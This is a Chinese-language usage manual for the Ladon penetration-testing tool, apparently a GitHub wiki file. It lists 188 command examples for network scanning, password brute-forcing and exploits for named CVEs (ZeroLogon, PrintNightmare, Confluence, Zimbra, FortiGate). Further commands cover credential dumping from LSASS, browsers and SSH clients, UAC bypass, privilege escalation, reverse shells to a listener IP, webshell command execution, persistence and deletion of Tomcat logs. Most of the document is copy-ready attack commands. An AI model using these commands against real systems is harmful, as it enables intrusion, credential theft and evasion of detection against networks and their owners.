-
Notifications
You must be signed in to change notification settings - Fork 56
/
Copy pathwiki.txt
869 lines (638 loc) · 26.7 KB
/
wiki.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
Ladon 简明使用教程 完整文档: http://k8gege.org/Ladon
支持Cmd、Cobalt Strike、PowerShell等内存加载
Windows版本: .Net、Cobalt Strike、PowerShell
全系统版本:GO(全平台)、Python(理论上全平台)
PS: Study方便本地测试使用,完整功能请使用CMD
### 版本
Ladon 10.10 20230318
简明用法例子 202例
### 001 自定义线程扫描
例子:扫描目标10.1.2段是否存在MS17010漏洞
单线程:Ladon 10.1.2.8/24 MS17010 t=1
80线程:Ladon noping 10.1.2.8/24 MS17010 t=80
高强度防护下扫描线程设置低一些,单线程或F单线程最佳
单线程:Ladon 10.1.2.8/24 MS17010 f=1
### 002 Socks5代理扫描
例子:扫描目标10.1.2段是否存在MS17010漏洞(必须加noping)
Ladon noping 10.1.2.8/24 MS17010
详见:http://k8gege.org/Ladon/proxy.html
### 003 网段扫描/批量扫描
CIDR格式:不只是/24/16/8(所有)
Ladon 192.168.1.8/24 扫描模块
Ladon 192.168.1.8/16 扫描模块
Ladon 192.168.1.8/8 扫描模块
字母格式:仅C段B段A段 顺序排序
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块
### 0x004指定IP范围、网段扫描
Ladon 192.168.1.50-192.168.1.200 ICMP ICMP探测1段50-200的存活主机
Ladon 192.168.1.30-192.168.50.80 ICMP ICMP探测1.30至50.80存活主机
TXT格式
##### 004 ICMP批量扫描C段列表存活主机
Ladon ip24.txt ICMP
##### 005 ICMP批量扫描B段列表存活主机
Ladon ip16.txt ICMP
##### 006 ICMP批量扫描cidr列表(如某国IP段)
Ladon cidr.txt ICMP
##### 007 ICMP批量扫描域名是否存活
Ladon domain.txt ICMP
##### 008 ICMP批量扫描机器是否存活
Ladon host.txt ICMP
##### 009 WhatCMS批量识别CMS、Banner、SSL证书、标题,可识别未知CMS、路由器、打印机、网络设备、摄像头等
Ladon 192.168.1.8 WhatCMS 扫描IP
Ladon 192.168.1.8/24 WhatCMS 扫描C段
Ladon 192.168.1.8/C WhatCMS 扫描C段
Ladon 192.168.1.8/B WhatCMS 扫描B段
Ladon 192.168.1.8/A WhatCMS 扫描A段
Ladon IP.TXT WhatCMS 扫描IP列表
Ladon IP24.TXT WhatCMS 扫描C段列表
Ladon IP16.TXT WhatCMS 扫描B段列表
Ladon cidr.TXT WhatCMS 扫描整个国家IP段列表
禁PING扫描
Ladon noping 192.168.1.8 WhatCMS 扫描IP
Ladon noping 192.168.1.8/24 WhatCMS 扫描C段
##### 010 批量检测DrayTek路由器版本、漏洞、弱口令
Ladon url.txt DraytekPoc
##### 011 批量解密Base64密码
Ladon str.txt DeBase64
### 资产扫描、指纹识别、服务识别、存活主机、端口扫描
##### 012 ICMP扫描存活主机(最快)
Ladon 192.168.1.8/24 ICMP
##### 013 Ping探测存活主机(调用系统Ping命令 回显ms、ttl等信息)
Ladon 192.168.1.8/24 Ping
##### 014 多协议探测存活主机 (IP、机器名、MAC/域名、制造商/系统版本)
Ladon 192.168.1.8/24 OnlinePC
##### 015 多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)
Ladon 192.168.1.8/24 OsScan
##### 016 OXID探测多网卡主机
Ladon 192.168.1.8/24 EthScan
Ladon 192.168.1.8/24 OxidScan
##### 017 DNS探测多网卡主机
Ladon 192.168.1.8/24 DnsScan
##### 018 多协议扫描存活主机IP
Ladon 192.168.1.8/24 OnlineIP
##### 019 扫描SMB漏洞MS17010 (IP、机器名、漏洞编号、操作系统版本)
Ladon 192.168.1.8/24 MS17010
##### 020 SMBGhost漏洞检测 CVE-2020-0796 (IP、机器名、漏洞编号、操作系统版本)
Ladon 192.168.1.8/24 SMBGhost 10.9移除
##### 021 扫描Web HTTP、HTTPS信息
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
##### 022 扫描C段站点URL域名
Ladon 192.168.1.8/24 UrlScan
##### 023 扫描C段站点URL域名
Ladon 192.168.1.8/24 SameWeb
##### 024 扫描子域名、二级域名
Ladon baidu.com SubDomain
##### 025 域名解析IP、主机名解析IP
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
##### 025 批量域名解析IP、批量主机名解析IP
Ladon domain.txt DomainIP
Ladon host.txt HostIP
##### 025 批量域名、主机名解析 结果只有IP
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
##### 026 DNS查询域内机器、IP (条件域内)
Ladon AdiDnsDump 192.168.1.8 (Domain IP)
##### 027 查询域内机器、IP (条件域内)
Ladon GetDomainIP
##### 028 扫描C段端口、指定端口扫描
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
##### 029 扫描C段WEB及识别CMS(86+Web指纹识别)
Ladon 192.168.1.8/24 WhatCMS
##### 030 扫描思科设备
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
##### 031 枚举Mssql数据库主机 (数据库IP、机器名、SQL版本)
Ladon EnumMssql
##### 032 枚举网络共享资源 (域、IP、主机名\共享路径)
Ladon EnumShare
##### 033 扫描LDAP服务器(探测域控)
Ladon 192.168.1.8/24 LdapScan
##### 034 扫描FTP服务器并识别版本
Ladon 192.168.1.8/24 FtpScan
### 暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆
密码爆破详解参考SSH:http://k8gege.org/Ladon/sshscan.html
##### 035 445端口 SMB密码爆破(Windows)
Ladon 192.168.1.8/24 SmbScan
##### 036 135端口 Wmi密码爆破(Windowns)
Ladon 192.168.1.8/24 WmiScan
##### 037 389端口 LDAP服务器、AD域密码爆破(Windows)
Ladon 192.168.1.8/24 LdapScan
##### 038 5985端口 Winrm密码爆破(Windowns)
Ladon 192.168.1.8/24 WinrmScan
##### 039 445端口 SMB NTLM HASH爆破(Windows)
Ladon 192.168.1.8/24 SmbHashScan
##### 040 135端口 Wmi NTLM HASH爆破(Windows)
Ladon 192.168.1.8/24 WmiHashScan
##### 041 22端口 SSH密码爆破(Linux)
Ladon 192.168.1.8/24 SshScan
Ladon 192.168.1.8:22 SshScan
##### 042 1433端口 Mssql数据库密码爆破
Ladon 192.168.1.8/24 MssqlScan
##### 043 1521端口 Oracle数据库密码爆破
Ladon 192.168.1.8/24 OracleScan
##### 044 3306端口 Mysql数据库密码爆破
Ladon 192.168.1.8/24 MysqlScan
##### 045 7001端口 Weblogic后台密码爆破
Ladon http://192.168.1.8:7001/console WeblogicScan
Ladon 192.168.1.8/24 WeblogicScan
##### 046 5900端口 VNC远程桌面密码爆破
Ladon 192.168.1.8/24 VncScan
##### 047 21端口 Ftp服务器密码爆破
Ladon 192.168.1.8/24 FtpScan
##### 048 8080端口 Tomcat后台登陆密码爆破
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
##### 049 Web端口 401基础认证密码爆破
Ladon http://192.168.1.8/login HttpBasicScan
##### 050 445端口 Impacket SMB密码爆破(Windowns)
Ladon 192.168.1.8/24 SmbScan.ini
##### 051 445端口 IPC密码爆破(Windowns)
Ladon 192.168.1.8/24 IpcScan.ini
##### 052 139端口Netbios协议Windows密码爆破
Ladon 192.168.1.8/24 NbtScan
##### 053 5985端口Winrm协议Windows密码爆破
Ladon 192.168.1.8/24 WinrmScan
##### 054 网络摄像头密码爆破(内置默认密码)
Ladon 192.168.1.8/24 DvrScan
### 漏洞检测/Poc
##### 055 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144)
Ladon 192.168.1.8/24 MS17010
##### 056 SMBGhost漏洞检测 CVE-2020-0796
Ladon 192.168.1.8/24 SMBGhost
##### 057 Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)
Ladon 192.168.1.8/24 WeblogicPoc
##### 058 PhpStudy后门检测(phpstudy 2016/phpstudy 2018) 10.9移除
Ladon 192.168.1.8/24 PhpStudyPoc
##### 059 ActiveMQ漏洞检测(CVE-2016-3088)
Ladon 192.168.1.8/24 ActivemqPoc
##### 060 Tomcat漏洞检测(CVE-2017-12615)
Ladon 192.168.1.8/24 TomcatPoc
##### 061 Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)
Ladon 192.168.1.8/24 Struts2Poc
##### 062 DraytekPoc CVE-2020-8515漏洞检测、Draytek版本探测、弱口令检测
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
### 漏洞利用/Exploit
##### 063 Weblogic漏洞利用(CVE-2019-2725)
Ladon 192.168.1.8/24 WeblogicExp
##### 064 Tomcat漏洞利用(CVE-2017-12615)
Ladon 192.168.1.8/24 TomcatExp
##### 065 Windows 0day漏洞通用DLL注入执行CMD生成器(DLL仅5KB)
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
##### 066 CVE-2021-40444 微软IE/Office 0day漏洞
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
##### 067 DraytekExp CVE-2020-8515远程执行命令EXP
Ladon DraytekExp http://192.168.1.8 whoami
##### 068 ZeroLogon CVE-2020-1472域控提权(密码置空)
Ladon ZeroLogon dc.k8gege.org
##### 069 CVE-2020-0688 Exchange序列化漏洞(.net 4.0)
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
##### 070 ForExec循环漏洞利用(Win10永恒之黑CVE-2020-0796,成功退出以免目标蓝屏)
Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"
### 文件下载、文件传输
##### 071 HTTP下载 HTTPS下载 MSF下载
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
##### 072 Ftp下载
Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe
### 加密解密(HEX/Base64)
##### 073 Hex加密解密
Ladon 123456 EnHex
Ladon 313233343536 DeHex
##### 074 Base64加密解密
Ladon 123456 EnBase64
Ladon MTIzNDU2 DeBase64
### 网络嗅探
##### 075 Ftp密码嗅探
Ladon FtpSniffer 192.168.1.5
##### 076 HTTP密码嗅探
Ladon HTTPSniffer 192.168.1.5
##### 077 网络嗅探
Ladon Sniffer
### 密码读取
##### 078 读取IIS站点密码、网站路径
Ladon IISpwd
##### 079 读取连接过的WIFI密码
Ladon WifiPwd
##### 080 读取FileZilla FTP密码
Ladon FileZillaPwd
##### 081 读取系统Hash、VPN密码、DPAPI-Key 10.9移除
Ladon CVE-2021-36934
##### 082 DumpLsass内存密码(mimikatz明文) 限9.1.1版本之前
Ladon DumpLsass
### 信息收集
##### 083 获取本机内网IP与外网IP
Ladon GetIP
##### 084 获取PCname GUID CPUID DiskID Mac地址
Ladon GetID
##### 085 查看用户最近访问文件
Ladon Recent
##### 086 USB使用记录查看(USB名称、USB标记、路径信息)
Ladon UsbLog
##### 087 检测后门(注册表启动项、DLL劫持)
Ladon CheckDoor
Ladon AutoRun
##### 088 进程详细信息(程序路径、位数、启动参数、用户)
Ladon EnumProcess
Ladon Tasklist
##### 089 获取命令行参数
Ladon cmdline
Ladon cmdline cmd.exe
##### 090 获取渗透基础信息
Ladon GetInfo
Ladon GetInfo2
##### 091 .NET & PowerShell版本
Ladon NetVer
Ladon PSver
Ladon NetVersion
Ladon PSversion
##### 092 运行时版本&编译环境
Ladon Ver
Ladon Version
##### 093 运行时版本&编译环境&安装软件列表
Ladon AllVer
Ladon AllVersion
##### 094 查看IE代理信息
Ladon QueryProxy
##### 095 列目录
Ladon DirList 默认列全盘
Ladon DirList c:\ 指定盘符或目录
##### 096 QueryAdmin查看管理员用户
Ladon QueryAdmin
##### 097 查看本机命名管道
Ladon GetPipe
##### 098 RdpLog查看3389连接记录
Ladon RdpLog
### 远程执行(psexec/wmiexec/atexec/sshexec/smbexec)
##### 099 445端口 加密PSEXEC远程执行命令(交互式)
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
##### 100 135端口 WmiExec远程执行命令 (非交互式)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami (8.2前用法)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami (8.2后用法)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p (8.2后用法)
##### 101 445端口 AtExec远程执行命令(非交互式)
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
##### 102 22端口 SshExec远程执行命令(非交互式)
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
##### 103 JspShell远程执行命令(非交互式)9.3.0移除
Usage:Ladon JspShell type url pwd cmd
Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
##### 104 WebShell远程执行命令(非交互式)9.3.0移除
```Bash
Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami
Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami
获取系统版本信息 方便提权
Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo
```
##### 105 135端口 WmiExec2远程执行命令支持HASH (非交互式)支持文件上传
Usage:
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami 先Mimikatz注入Hash,再pth执行命令
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe 先Mimikatz注入Hash,再pth执行命令
##### 106 445端口 SmbExec Ntlm-Hash非交互式远程执行命令(无回显)
Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami
Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p
##### 107 WinrmExec远程执行命令无回显(支持System权限)
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe
### 提权降权
##### 108 whoami查看当前用户权限以及特权
Ladon whoami
##### 109 6种白名单BypassUAC(8.0后)Win7-Win10 10.8版本移除
用法: Ladon BypassUAC Method Base64Cmd
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
##### 110 BypassUac2 绕过UAC执行,支持Win7-Win10 10.8版本移除
Ladon BypassUac2 c:\1.exe
Ladon BypassUac2 c:\1.bat
##### 111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527)打印机漏洞提权EXP
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
##### 112 CVE-2022-21999 SpoolFool打印机漏洞提权EXP
Ladon SpoolFool poc.dll
Ladon CVE-2022-21999 poc.dll
##### 113 GetSystem 提权System权限执行CMD
Ladon GetSystem cmd.exe
##### 114 复制令牌执行CMD(如system权限降权exploer当前用户)
Ladon GetSystem cmd.exe explorer
##### 115 Runas 模拟用户执行命令
Ladon Runas user pass cmd
##### 116 MS16135提权至SYSTEM
Ladon ms16135 whoami >=9.2.1版本移除
##### 117 BadPotato服务用户提权至SYSTEM
Ladon BadPotato cmdline
##### 118 SweetPotato服务用户提权至SYSTEM
Ladon SweetPotato cmdline
##### 119 EfsPotato Win7-2019提权(服务用户权限提到system)
Ladon EfsPotato whoami
##### 120 Open3389一键开启3389
Ladon Open3389
##### 121 激活内置管理员Administrator
Ladon ActiveAdmin
##### 122 激活内置用户Guest
Ladon ActiveGuest
### 反弹Shell
##### 123 反弹TCP NC Shell
Ladon ReverseTcp 192.168.1.8 4444 nc
##### 124 反弹TCP MSF Shell
Ladon ReverseTcp 192.168.1.8 4444 shell
##### 125 反弹TCP MSF MET Shell
Ladon ReverseTcp 192.168.1.8 4444 meter
##### 126 反弹HTTP MSF MET Shell
Ladon ReverseHttp 192.168.1.8 4444
##### 127 反弹HTTPS MSF MET Shell
Ladon ReverseHttps 192.168.1.8 4444
##### 128 反弹TCP CMD & PowerShell Shell
Ladon PowerCat 192.168.1.8 4444 cmd
Ladon PowerCat 192.168.1.8 4444 psh
##### 129 反弹UDP Cmd & PowerShell Shell
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
##### 130 netsh本机888端口转发至112的22端口
Ladon netsh add 888 192.168.1.112 22
##### 131 PortTran端口转发(3389例子)
VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338
### 本机执行
##### 132 RDP桌面会话劫持(无需密码)
Ladon RdpHijack 3
Ladon RdpHijack 3 console
##### 133 添加注册表Run启动项
Ladon RegAuto Test c:\123.exe
##### 134 AT计划执行程序(无需时间)(system权限)
Ladon at c:\123.exe
Ladon at c:\123.exe gui
##### 135 SC服务加启动项&执行程序(system权限)
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName
### 系统信息探测
##### 136 Snmp协议探测操作系统、设备等信息
Ladon 192.168.1.8/24 SnmpInfo
##### 137 Nbt协议探测Windows主机名、域、用户
Ladon 192.168.1.8/24 NbtInfo
##### 138 Smb协议探测Windows版本、主机名、域
Ladon 192.168.1.8/24 SmbInfo
##### 139 Wmi协议探测Windows版本、主机名、域
Ladon 192.168.1.8/24 WmiInfo
##### 140 Mssql协议探测Windows版本、主机名、域
Ladon 192.168.1.8/24 MssqlInfo
##### 141 Winrm协议探测Windows版本、主机名、域
Ladon 192.168.1.8/24 WinrmInfo
##### 142 Exchange探测Windows版本、主机名、域
Ladon 192.168.1.8/24 ExchangeInfo
##### 143 Rdp协议探测Windows版本、主机名、域
For单线程: Ladon 192.168.1.8/24 RdpInfo f=1
### 其它功能
##### 144 Win2008一键启用.net 3.5
Ladon EnableDotNet
##### 145 获取内网站点HTML源码
Ladon gethtml http://192.168.1.1
##### 146 一键迷你WEB服务器
Ladon web 80
Ladon web 80 dir
获取外网IP(VPS上启动WEB,目标访问ip.txt或ip.jpg)
http://192.168.1.8/ip.txt
##### 147 getstr/getb64/debase64/savetxt(无回显漏洞回显结果)
监听 Ladon web 800
提交 返回明文
certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456
Base64加密结果
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Base64结果解密
certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw
##### 148 Shiro插件探测
Ladon 192.168.1.8/24 IsShiro
##### 149 LogDelTomcat 删除Tomcat指定IP日志
Ladon LogDelTomcat access.log 192.168.1.8
##### 150 C#自定义程序集插件扫描
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
##### 151 ReadFile 读取大文件前面指定长度内容
Ladon ReadFile c:\k8.exe 默认1k
Ladon ReadFile c:\k8.exe 1K
Ladon ReadFile c:\k8.exe 1024K
Ladon ReadFile c:\k8.exe 1M
##### 152 修改注册表读取2012及后系统明文密码
Ladon SetMzLogonPwd 1
##### 153 修改注册表劫持签名签证
Ladon SetSignAuth 1
##### 154 IP24 批量IP转成ip24格式(192.168.1.1/24)
Ladon ip.txt IP24
##### 155 IPC 批量IP转成ip C格式(192.168.1.)
Ladon ip.txt IPC
##### 156 IPB 批量IP转成ip B格式(192.168.)
Ladon ip.txt IPB
##### 157 漏洞检测Atlassian Confluence CVE-2022-26134
Ladon url.txt CVE-2022-26134
##### 158 Atlassian Confluence CVE-2022-26134 EXP
Ladon EXP-2022-26134 https://111.229.255.81 id
##### 159 RevShell-2022-26134 CVE-2022-26134反弹Shell
Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort
Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444
##### 160 SslInfo 证书探测设备、IP、域名、机器名、组织机构等信息
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo 指定端口
Ladon noping fbi.gov SslInfo 禁ping探测
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
##### 161 SslInfo 证书批量探测设备、IP、域名、机器名、组织机构等信息
Ladon ip.txt SslInfo
Ladon url.txt SslInfo
Ladon 192.168.1.1/c SslInfo
Ladon 192.168.1.1/b SslInfo
##### 162 WPinfo 多种方法获取WordPress主程序、主题、插件版本
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo 禁ping探测
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
##### 163 WPinfo 批量获取WordPress主程序、主题、插件版本
Ladon ip.txt WPinfo
Ladon url.txt WPinfo
Ladon 192.168.1.1/c WPinfo
Ladon 192.168.1.1/b WPinfo
##### 164 Exchange暴力破解 识别Exchange密码爆破
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan
##### 165 CVE-2022-27925 批量探测Zimbra邮服ZIP目录穿越RCE漏洞
Ladon 192.168.1.8 CVE-2022-27925
Ladon http://zimbra.k8gege.org CVE-2022-27925
Ladon ip.txt CVE-2022-27925
Ladon url.txt CVE-2022-27925
Ladon 192.168.1.1/c CVE-2022-27925
Ladon 192.168.1.1/b CVE-2022-27925
##### 166 EXP-2022-27925 Zimbra邮服未授权RCE漏洞EXP GetShell
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
##### 167 WebShellCmd 连接jsp WebShell(支持cd、k8、ua、uab64)
Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami
##### JSP UAshell 查看系统版本、python、gcc等信息方便提权
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
##### 168 WebShellCmd 连接jsp WebShell(支持cd、k8、ua、uab64)
Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami
##### 169 非交互式连接IIS-Raid后门执行命令
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
##### 170 FindIP匹配IP段是否出现在漏洞结果中
Ladon FindIP ipc.txt ISVUL.txt (精确搜索)
Ladon FindIP ipc.txt ISVUL.txt like (模糊搜索)
##### 171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 路由器密码读取
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码
##### 172 PrinterPoc 打印机PJL任意代码执行漏洞批量检测
Ladon 192.168.1.8 PrinterPoc
Ladon ip.txt PrinterPoc
禁ping机器扫描使用noping
Ladon noping 192.168.1.8 PrinterPoc
Ladon noping ip.txt PrinterPoc
##### 173 通过Mac查询制造商(Ladon Mac MAC地址)
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
##### 174 Cisco VPN路由器密码爆破(内置默认密码,支持明文、Hash)
Ladon 192.168.1.8/24 CiscoScan
Ladon https://192.168.1.8 CiscoScan
Ladon ip.txt CiscoScan
Ladon url.txt CiscoScan
##### 175 vsFTPdPoc CVE-2011-2523 vsftpd 2.3.4 笑脸后门漏洞检测 10.9移除
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc
##### 176 WpScan WordPress密码审计、弱口令
Ladon http://192.168.1.8 WpScan
Ladon url.txt WpScan
Ladon 192.168.1.8/24 WpScan http 扫描IP时添加http://
##### 177 探测Exchange版本
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
##### 178 Exchange高危RCE漏洞检测
Ladon https://192.168.1.8 ExchangePoc
##### 179 Http/S获取网页返回头信息
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http 扫描IP时添加http://
Ladon ip.txt GetHead https 扫描IP时添加https://
##### 180 Http/S获取网页返回头信息+源码
Ladon https://192.168.1.8 GetHtml
Ladon ip.txt GetHtml
Ladon 192.168.1.8/24 GetHtml http
Ladon ip.txt GetHtml https 扫描IP时添加https://
##### 181 Http/S获取网页中的域名
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https 扫描IP时添加https://
##### 182 TrueIP获取域名真实IP(可用域名、标题、Banner等唯一关键字特征)
Ladon ip.txt TrueIP k8gege.org
Ladon 192.168.1.8/24 TrueIP k8gege.org
Ladon ip.txt TrueIP "K8哥哥"
Ladon 192.168.1.8/24 TrueIP "K8哥哥"
##### 183 Firefox密码\Cookie\历史记录读取
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
##### 184 BypassUAC11无回显支持Win7、Win8、Win11 Win2012\2016\2019等 10.8版本移除
Ladon40 BypassUAC11 cmd
Ladon40 BypassUAC11 c:\1.bat
Ladon40 BypassUAC11 c:\1.exe
##### 185 GetPwd支持Navicat、TeamView、Xshell、SecureCRT密码读取
Ladon GetPwd
##### 186 DraytekScan 密码审计Draytek弱口令检测
Ladon 192.168.1.8 DraytekScan
Ladon https://192.168.1.8 DraytekScan
Ladon 192.168.1.8/24 DraytekScan
Ladon url.txt DraytekScan
##### 187 XshellPwd Xshell密码读取
Ladon XshellPwd
##### 188 FortiGate CVE-2022-40684 未授权写SSH-KEY admin admin123
Ladon 192.168.1.8 CVE-2022-40684
